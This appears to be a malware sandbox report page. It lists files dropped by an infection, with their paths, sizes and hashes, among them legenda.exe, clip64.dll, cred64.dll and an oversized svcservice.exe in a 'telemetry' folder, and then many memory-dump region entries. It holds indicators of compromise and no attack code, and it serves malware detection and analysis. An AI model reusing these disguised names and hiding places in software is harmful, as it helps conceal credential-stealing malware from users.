8c8c03168bca22fe794885e8ccc348328e400981b4cffe32a363495ffc90329bec2d10fcdf128af1ca5dcf37a7167653104562006af9c433264a327a0e2d75d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3082.exe
Filesize
324KB

MD5
245e1c88fda8f341b89e963d69405e32

SHA1
b0e09fe3daf88d7004a39f824b8a58dc34299264

SHA256
6a47a6e39d91283cc8167c651f0b2a3bbbd3c7d24edf157052ff4029c47a5aee

SHA512
8c8c03168bca22fe794885e8ccc348328e400981b4cffe32a363495ffc90329bec2d10fcdf128af1ca5dcf37a7167653104562006af9c433264a327a0e2d75d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2742Gm.exe
Filesize
11KB

MD5
7e93bacbbc33e6652e147e7fe07572a0

SHA1
421a7167da01c8da4dc4d5234ca3dd84e319e762

SHA256
850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

SHA512
250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2742Gm.exe
Filesize
11KB

MD5
7e93bacbbc33e6652e147e7fe07572a0

SHA1
421a7167da01c8da4dc4d5234ca3dd84e319e762

SHA256
850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

SHA512
250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py77UW65.exe
Filesize
226KB

MD5
1eb9984ec1e80c9c9ee367eedbfe4bda

SHA1
749dff202b7ae1880b03cc80d4433652c3c48e78

SHA256
64360a83488e081d3f3cde9bfa534d916f29fac20d92e1d785891eb16de9784f

SHA512
3a85d9e09360086ac62b5c79c72b2280e03c2fd5b15069a5e972c02bdee3b89dd87ec6ed4b5c6c7f22059e643eac2280c8672d911deec896a8c9e398b6ca6205

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py77UW65.exe
Filesize
226KB

MD5
1eb9984ec1e80c9c9ee367eedbfe4bda

SHA1
749dff202b7ae1880b03cc80d4433652c3c48e78

SHA256
64360a83488e081d3f3cde9bfa534d916f29fac20d92e1d785891eb16de9784f

SHA512
3a85d9e09360086ac62b5c79c72b2280e03c2fd5b15069a5e972c02bdee3b89dd87ec6ed4b5c6c7f22059e643eac2280c8672d911deec896a8c9e398b6ca6205

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ie1mo2.xrt.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dat
Filesize
557KB

MD5
b15c9612f747a2c7d6c429275c853b23

SHA1
46b5013dcc6677feabafb3c35d8aec6e79e1e6d3

SHA256
07b7dbc6e80247cee12695bc386079435ec90d0228f799ff884330b9f4e3c2d5

SHA512
2f70c8c18434e7a7e1475acda04ba2d3e13fd20c73ee14ff28eda50394898333e8c7067bea69cca28cff1226cdf050db55df2bcd629fb82b9f0535a505d07305

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\db.dll
Filesize
52KB

MD5
1b20e998d058e813dfc515867d31124f

SHA1
c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

SHA256
24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

SHA512
79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
Filesize
235KB

MD5
5086db99de54fca268169a1c6cf26122

SHA1
003f768ffcc99bda5cda1fb966fda8625a8fdc3e

SHA256
42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

SHA512
90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
Filesize
89KB

MD5
16cf28ebb6d37dbaba93f18320c6086e

SHA1
eae7d4b7a9636329065877aabe8d4f721a26ab25

SHA256
c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

SHA512
f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
Filesize
89KB

MD5
16cf28ebb6d37dbaba93f18320c6086e

SHA1
eae7d4b7a9636329065877aabe8d4f721a26ab25

SHA256
c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

SHA512
f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
Filesize
89KB

MD5
16cf28ebb6d37dbaba93f18320c6086e

SHA1
eae7d4b7a9636329065877aabe8d4f721a26ab25

SHA256
c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106

SHA512
f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
Filesize
223B

MD5
94cbeec5d4343918fd0e48760e40539c

SHA1
a049266c5c1131f692f306c8710d7e72586ae79d

SHA256
48eb3ca078da2f5e9fd581197ae1b4dfbac6d86040addbb305e305c014741279

SHA512
4e92450333d60b1977f75c240157a8589cfb1c80a979fbe0793cc641e13556004e554bc6f9f4853487dbcfcdc2ca93afe610649e9712e91415ed3f2a60d4fec0

Download Submit
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
Filesize
619.5MB

MD5
e9f047df637c2b1ee4d9f648f3386151

SHA1
1047082206d1e287cbd0534b52659ac0c1674cd3

SHA256
26bc973e7827cd2899845df79dd9e842127bc296d532d79c1c1d1231f3bd7198

SHA512
8fc30eb0061d75bb7cc9b48af43989a560440ec11c37423672c12c9c553f66a1b85496a3b3fe83f992387f5d56e2b31a8cda74d97a38e0faa0d08f6869a70ed4

Download Submit
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
Filesize
598.3MB

MD5
929f9615d20a1f8d28edb658912cde04

SHA1
e5539e32f6ead6fe9f58ef6a3e338b3dd602f48b

SHA256
f3ce89af9ed9a32e8ffde69d73f13e995bd93a7a4caf510cc666ad1c7cdbda98

SHA512
e4ed33a77b225f15a8a753f1d351698c964406a909d87148244e43f9a6a6a05153a2202699bd2d413f0a2ec1b625bfb679d5b00b35589a64dce0b5daf55cc958

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Roaming\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
memory/468-431-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-462-0x00000163092D0000-0x0000016309373000-memory.dmp

Filesize
652KB

Download
memory/468-469-0x00000163092D0000-0x0000016309373000-memory.dmp

Filesize
652KB

Download
memory/468-468-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-464-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-461-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-439-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-434-0x0000016326270000-0x0000016326798000-memory.dmp

Filesize
5.2MB

Download
memory/468-421-0x000001630B0F0000-0x000001630B112000-memory.dmp

Filesize
136KB

Download
memory/468-419-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-418-0x00007FFD7AF70000-0x00007FFD7AF80000-memory.dmp

Filesize
64KB

Download
memory/468-416-0x00000163092D0000-0x0000016309373000-memory.dmp

Filesize
652KB

Download
memory/468-415-0x0000016309700000-0x0000016309710000-memory.dmp

Filesize
64KB

Download
memory/468-409-0x00000163092D0000-0x0000016309373000-memory.dmp

Filesize
652KB

Download
memory/468-404-0x00000163092D0000-0x0000016309373000-memory.dmp

Filesize
652KB

Download
memory/760-310-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/960-443-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/980-460-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/1560-278-0x0000000001FF0000-0x000000000202E000-memory.dmp

Filesize
248KB

Download
memory/1560-444-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/1560-399-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/2204-203-0x0000000005DF0000-0x0000000006408000-memory.dmp

Filesize
6.1MB

Download
memory/2204-205-0x00000000058A0000-0x00000000058B2000-memory.dmp

Filesize
72KB

Download
memory/2204-207-0x0000000005BE0000-0x0000000005BF0000-memory.dmp

Filesize
64KB

Download
memory/2204-214-0x0000000008C00000-0x000000000912C000-memory.dmp

Filesize
5.2MB

Download
memory/2204-202-0x0000000000EC0000-0x0000000000EF2000-memory.dmp

Filesize
200KB

Download
memory/2204-204-0x0000000005970000-0x0000000005A7A000-memory.dmp

Filesize
1.0MB

Download
memory/2204-208-0x0000000005C90000-0x0000000005D22000-memory.dmp

Filesize
584KB

Download
memory/2204-213-0x0000000008500000-0x00000000086C2000-memory.dmp

Filesize
1.8MB

Download
memory/2204-212-0x0000000005BE0000-0x0000000005BF0000-memory.dmp

Filesize
64KB

Download
memory/2204-211-0x0000000007170000-0x00000000071C0000-memory.dmp

Filesize
320KB

Download
memory/2204-210-0x00000000070F0000-0x0000000007166000-memory.dmp

Filesize
472KB

Download
memory/2204-209-0x0000000005D30000-0x0000000005D96000-memory.dmp

Filesize
408KB

Download
memory/2204-206-0x0000000005900000-0x000000000593C000-memory.dmp

Filesize
240KB

Download
memory/2252-266-0x00000000000C0000-0x00000000001A6000-memory.dmp

Filesize
920KB

Download
memory/2252-277-0x0000000002270000-0x0000000002280000-memory.dmp

Filesize
64KB

Download
memory/3348-189-0x0000000000720000-0x000000000074D000-memory.dmp

Filesize
180KB

Download
memory/3348-193-0x0000000000400000-0x00000000004B8000-memory.dmp

Filesize
736KB

Download
memory/3348-160-0x0000000004B30000-0x00000000050D4000-memory.dmp

Filesize
5.6MB

Download
memory/3348-161-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-190-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3348-164-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-188-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-162-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-168-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-166-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-186-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-198-0x0000000000400000-0x00000000004B8000-memory.dmp

Filesize
736KB

Download
memory/3348-197-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3348-196-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3348-182-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-195-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3348-180-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-176-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-184-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-178-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-174-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-170-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-191-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3348-172-0x0000000002530000-0x0000000002542000-memory.dmp

Filesize
72KB

Download
memory/3348-192-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/3444-471-0x00007FF4FDAB0000-0x00007FF4FDE81000-memory.dmp

Filesize
3.8MB

Download
memory/3444-405-0x00007FFD7AF80000-0x00007FFD7AF90000-memory.dmp

Filesize
64KB

Download
memory/3444-400-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-433-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-438-0x00007FF4FDAB0000-0x00007FF4FDE81000-memory.dmp

Filesize
3.8MB

Download
memory/3444-401-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-393-0x00007FF4FDAB0000-0x00007FF4FDE81000-memory.dmp

Filesize
3.8MB

Download
memory/3444-470-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-392-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-436-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-463-0x0000000140000000-0x000000014105D000-memory.dmp

Filesize
16.4MB

Download
memory/3444-394-0x00007FFD7AF70000-0x00007FFD7AF80000-memory.dmp

Filesize
64KB

Download
memory/3484-408-0x0000000005170000-0x0000000005180000-memory.dmp

Filesize
64KB

Download
memory/3484-450-0x0000000005170000-0x0000000005180000-memory.dmp

Filesize
64KB

Download
memory/3496-512-0x00000154C95E0000-0x00000154C9600000-memory.dmp

Filesize
128KB

Download
memory/3496-513-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp

Filesize
8.0MB

Download
memory/3496-519-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp

Filesize
8.0MB

Download
memory/3496-522-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp

Filesize
8.0MB

Download
memory/3496-523-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp

Filesize
8.0MB

Download
memory/3768-344-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/3768-311-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/3768-435-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/4088-289-0x0000000000990000-0x00000000009C2000-memory.dmp

Filesize
200KB

Download
memory/4088-299-0x00000000053F0000-0x0000000005400000-memory.dmp

Filesize
64KB

Download
memory/4160-383-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/4368-506-0x0000021E615F0000-0x0000021E617E5000-memory.dmp

Filesize
2.0MB

Download
memory/4368-507-0x0000021E61D50000-0x0000021E61F52000-memory.dmp

Filesize
2.0MB

Download
memory/4368-480-0x0000021E608E0000-0x0000021E608F0000-memory.dmp

Filesize
64KB

Download
memory/4368-465-0x0000021E608E0000-0x0000021E608F0000-memory.dmp

Filesize
64KB

Download
memory/4368-521-0x0000021E61D50000-0x0000021E61F52000-memory.dmp

Filesize
2.0MB

Download
memory/4432-154-0x0000000000370000-0x000000000037A000-memory.dmp

Filesize
40KB

Download
memory/4548-356-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4548-413-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4548-477-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download